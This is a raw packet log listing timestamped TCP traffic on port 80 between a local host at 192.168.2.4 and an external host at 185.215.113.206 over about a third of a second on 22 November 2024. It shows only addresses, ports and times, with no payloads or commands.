Nov 22, 2024 20:35:26.858347893 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.858386993 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.859294891 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.859340906 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.859411955 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.859451056 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.860157013 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.860203028 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.860251904 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.860297918 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.861157894 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.861207008 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.861210108 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.861248016 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.862024069 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.862070084 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.862143040 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.862186909 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.863107920 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.863157034 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.975049019 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.975126982 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.975203991 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.975248098 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.975502014 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.975543976 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.975544930 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.975584030 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.976098061 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.976141930 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.976270914 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.976320028 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.977027893 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.977075100 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.977108002 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.977148056 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.978035927 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.978080034 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.978180885 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.978228092 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.978935957 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.978980064 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.979027987 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.979067087 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.979844093 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.979888916 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.979959011 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.980001926 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.980758905 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.980803013 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.980866909 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.980910063 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.981703043 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.981749058 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.981834888 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.981874943 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.982661963 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.982708931 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.982763052 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.982805967 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.983623981 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.983664989 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.983799934 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.983848095 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.984651089 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.984683990 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.984694004 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.984736919 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.985712051 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.985764027 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.985853910 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.985896111 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.986496925 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.986541033 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.986588955 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.986629009 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.987406015 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.987452030 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.987457037 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.987482071 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.988320112 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.988364935 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.988451004 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.988488913 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.989285946 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.989330053 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.989402056 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.989443064 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.990187883 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.990236044 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.990319967 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.990360975 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.991137028 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.991184950 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.991275072 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.991321087 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.992063999 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.992125034 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.992182970 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.992225885 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.992989063 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.993032932 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.993114948 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.993158102 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.993941069 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.993985891 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.994036913 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.994077921 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.994977951 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.995023966 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.995076895 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.995182037 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.995799065 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.995846987 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.995871067 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.995913982 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.996979952 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.997025013 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.997064114 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.997107029 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.997685909 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.997730017 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:26.997740030 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:26.997778893 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.029863119 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.029916048 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.029942989 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.029983044 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.030035019 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.030111074 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.030141115 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.030179024 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.030195951 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.030230045 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.031096935 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.031141996 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.031354904 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.031399012 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.032016039 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.032058001 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.032128096 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.032166958 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.032988071 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.033030033 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.033091068 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.033130884 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.033896923 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.033937931 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.034080029 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.034118891 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.034827948 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.034869909 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.034934998 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.034980059 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.035773039 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.035823107 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.035912991 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.035948992 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.036726952 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.036766052 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.036891937 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.036967993 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.037643909 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.037703991 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.037729025 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.037764072 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.038638115 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.038693905 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.038722992 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.038769960 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.039542913 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.039592028 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.039761066 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.039809942 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.040497065 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.040544033 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.040585041 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.040627956 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.041416883 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.041465044 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.041521072 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.041555882 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.042382956 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.042423010 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.042490005 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.042529106 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.043412924 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.043452024 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.043454885 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.043489933 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.044280052 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.044323921 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.044429064 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.044471025 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.045198917 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.045252085 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.045296907 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.045340061 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.046135902 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.046183109 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.046231031 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.046274900 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.047089100 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.047158003 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.047208071 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.047250986 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.048213005 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.048283100 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.048343897 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.048388004 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.048953056 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.048993111 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.049071074 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.049114943 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.049899101 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.049945116 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.050004959 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.050039053 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.050825119 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.050877094 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.050940037 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.050982952 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.051755905 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.051806927 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.051883936 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.051928043 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.052747011 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.052792072 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.052933931 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.052975893 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.053674936 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.053719044 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.053755045 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.053802013 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.054583073 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.054625988 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.054735899 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.054789066 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.055510998 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.055555105 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.055676937 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.055716991 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.056473970 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.056545019 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.056562901 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.056667089 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.167404890 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.167467117 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.167499065 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.167529106 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.167834044 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.167876005 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.167889118 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.167922974 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.168766975 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.168817997 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.168875933 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.168916941 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.169786930 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.169828892 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.169853926 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.169886112 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.170685053 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.170727015 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.170773029 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.170806885 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.171576977 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.171617985 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.171694994 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.171740055 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.172574043 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.172636032 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.172677994 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.172715902 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.173474073 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.173516035 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.173582077 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.173621893 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.174417019 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.174460888 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.174613953 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.174653053 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.175437927 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.175488949 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.175533056 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.175571918 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.176331043 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.176374912 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.176457882 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.176503897 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.177337885 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.177381992 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.177426100 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.177469015 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.178209066 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.178252935 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.178287029 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.178324938 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.179132938 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.179174900 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.179230928 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.179270029 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.180068016 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.180119038 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.180177927 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.180222034 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.180991888 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.181041956 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.181101084 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.181155920 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.181957960 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.182005882 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.182344913 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.182394028 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.182883024 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.182950020 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.182976007 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.183020115 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.183852911 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.183902025 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.184009075 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.184058905 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.184758902 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.184808969 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.184884071 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.184933901 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.185722113 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.185771942 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.185812950 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.185854912 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.186626911 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.186680079 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.186748981 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.186791897 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.187570095 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.187619925 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.187699080 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.187747955 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:27.188519955 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:27.188565016 CET	49750	80	192.168.2.4	185.215.113.206
